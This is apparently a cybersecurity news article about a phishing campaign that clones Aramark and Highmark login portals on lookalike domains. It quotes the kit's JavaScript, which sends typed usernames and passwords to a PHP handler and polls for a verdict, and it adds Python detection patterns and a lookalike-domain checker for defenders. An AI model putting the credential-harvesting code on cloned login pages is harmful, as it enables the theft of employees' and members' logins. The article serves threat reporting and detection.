A sophisticated phishing campaign has been identified targeting employee and member portals of major organizations including Aramark, Highmark, and various healthcare providers. These malicious sites are hosted on domains crafted to appear legitimate, such as "myinfoaramapay[.]com" impersonating Aramark's MyAccess portal and "hignmarkedmemb[.]com" spoofing Highmark healthcare's member portal.

The campaign utilizes cloned login pages designed to harvest credentials through PHP-based phishing kits, with the attackers implementing server-side validation techniques to avoid detection by security tools and researchers. The phishing pages are meticulously designed to mimic legitimate login interfaces, complete with company branding, identical layouts, and familiar user experiences.

The phishing sites operate behind specific paths such as "/online" directories, with root domain access resulting in 403 Forbidden errors—a tactical decision likely intended to limit unwanted attention from security scanners and researchers.

Where earlier phishing kits performed client-side validation and redirects that were easily detectable, the current campaign has shifted credential checking to server-side operations, making analysis substantially more difficult and limiting visibility into the attack flow. Rather than using client-side JavaScript to validate and redirect users after credential theft—a technique that leaves traces easily detectable by security tools—the new approach implements a polling mechanism to a backend script:

```javascript
function getUpdatesSubmit() {
  // cache the entered username in the browser, then POST both fields to the kit's PHP handler
  localStorage.setItem("uname", document.getElementById("username").value);
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "xxx.php", true);
  xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhr.send("username=" + document.getElementById("username").value +
           "&password=" + document.getElementById("password").value);
  // poll the server-side checker until it reports a verdict on the submitted credentials
  setInterval(function() {
    var request = new XMLHttpRequest();
    request.open("GET", "check.php", true);
    request.onload = function() {
      if (request.responseText == "success") {
        window.location = "./verify/";
      } else if (request.responseText == "error") {
        alert("Invalid credentials.");
      }
      // any other response: keep polling silently
    };
    request.send();
  }, POLL_INTERVAL_MS); // the interval value is not shown in the article's excerpt
}
```

The script polls for three possible responses: "success" (redirecting to a verification page), "error" (displaying an alert about invalid credentials), or no response (continuing to poll silently).

More advanced variants include two-factor authentication phishing capabilities using a "getUpdates2fa()" function that captures one-time passwords with a "type = 3" parameter to differentiate OTP collection from initial credential theft.
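As an added defensive example (not code from the article or from the campaign's kit), the Python below turns two of the observations above into checks an analyst could run over captured page source and over newly observed domains: a set of regex signals for the POST-then-poll credential flow and the getUpdates2fa/type=3 OTP stage, and a windowed edit-distance test that flags brand lookalike labels such as the two domains named above. The brand names come from the article; the legitimate-domain allowlist, the signal names, the thresholds and the two sample scripts are constructed assumptions.

```python
import re

# Brands the article names as impersonated; the allowlist of legitimate domains is assumed.
BRANDS = ("aramark", "highmark")
LEGIT_DOMAINS = {"aramark.com", "highmark.com"}

# Signals derived from the kit behaviour the article describes (names are our own):
# credentials POSTed to a PHP handler, a setInterval loop polling a PHP status endpoint,
# branching on the literal "success"/"error" tokens, and the optional OTP stage.
KIT_SIGNALS = {
    "posts_credentials_to_php": re.compile(r"open\(\s*[\"']POST[\"']\s*,\s*[\"'][^\"']*\.php[\"']"),
    "reads_password_field": re.compile(r"getElementById\(\s*[\"']password[\"']\s*\)"),
    "stores_username_locally": re.compile(r"localStorage\.setItem\(\s*[\"']uname[\"']"),
    "polls_with_setInterval": re.compile(r"setInterval\s*\("),
    "polls_php_status_endpoint": re.compile(r"open\(\s*[\"']GET[\"']\s*,\s*[\"'][^\"']*\.php[\"']"),
    "branches_on_success_token": re.compile(r"responseText\s*===?\s*[\"']success[\"']"),
    "branches_on_error_token": re.compile(r"responseText\s*===?\s*[\"']error[\"']"),
    "otp_stage_present": re.compile(r"getUpdates2fa\s*\(|\btype\s*=\s*[\"']?3\b"),
}


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute), row-by-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def refang(domain):
    """Undo common defanging ('[.]', '(.)') so indicator lists can be fed in as published."""
    return domain.lower().replace("[.]", ".").replace("(.)", ".").strip()


def lookalike_brand(domain, max_distance=2):
    """Return the brand a domain's registrable label imitates, or None.
    A brand-length window slides over the label so embedded misspellings
    ('hignmark' inside 'hignmarkedmemb') are caught, not only whole-label typos."""
    domain = refang(domain)
    if domain in LEGIT_DOMAINS:
        return None
    label = domain.split(".")[-2] if "." in domain else domain  # assumes a single-label TLD
    best = None
    for brand in BRANDS:
        n = len(brand)
        windows = [label[i:i + n] for i in range(max(1, len(label) - n + 1))]
        d = min(levenshtein(w, brand) for w in windows)
        if d <= max_distance and (best is None or d < best[1]):
            best = (brand, d)
    return best[0] if best else None


def scan_page_script(script, min_signals=4):
    """Match every kit signal against captured page JavaScript; several must co-occur."""
    hits = sorted(name for name, rx in KIT_SIGNALS.items() if rx.search(script))
    return {"signals": hits, "suspicious": len(hits) >= min_signals}


# Constructed sample mirroring the handler shape the article quotes (not the kit's file).
SAMPLE_KIT_JS = r'''
function getUpdatesSubmit() {
  localStorage.setItem("uname", document.getElementById("username").value);
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "xxx.php", true);
  xhr.send("username=" + document.getElementById("username").value +
           "&password=" + document.getElementById("password").value);
  setInterval(function () {
    var request = new XMLHttpRequest();
    request.open("GET", "check.php", true);
    request.onload = function () {
      if (request.responseText == "success") { window.location = "./verify/"; }
      else if (request.responseText == "error") { alert("Invalid credentials."); }
    };
    request.send();
  }, 2000);
}
'''

# Constructed benign login handler: one request, server decides, no polling loop.
SAMPLE_BENIGN_JS = r'''
async function login(form) {
  const res = await fetch("/api/session", {method: "POST", body: new FormData(form)});
  if (res.ok) { window.location = "/home"; }
}
'''

if __name__ == "__main__":
    for d in ("myinfoaramapay[.]com", "hignmarkedmemb[.]com", "aramark.com"):
        print(d, "->", lookalike_brand(d))
    print(scan_page_script(SAMPLE_KIT_JS))
    print(scan_page_script(SAMPLE_BENIGN_JS))
```

The signal threshold is deliberately a count rather than any single match: setInterval or a POST to a PHP file alone is ordinary, but the credential POST followed by a polling loop that keys on "success"/"error" is the fingerprint the article describes. The lookalike check is a triage aid only; a hit should feed a human review, not an automatic block.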
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 16 Apr 2025 22:40:10 +0000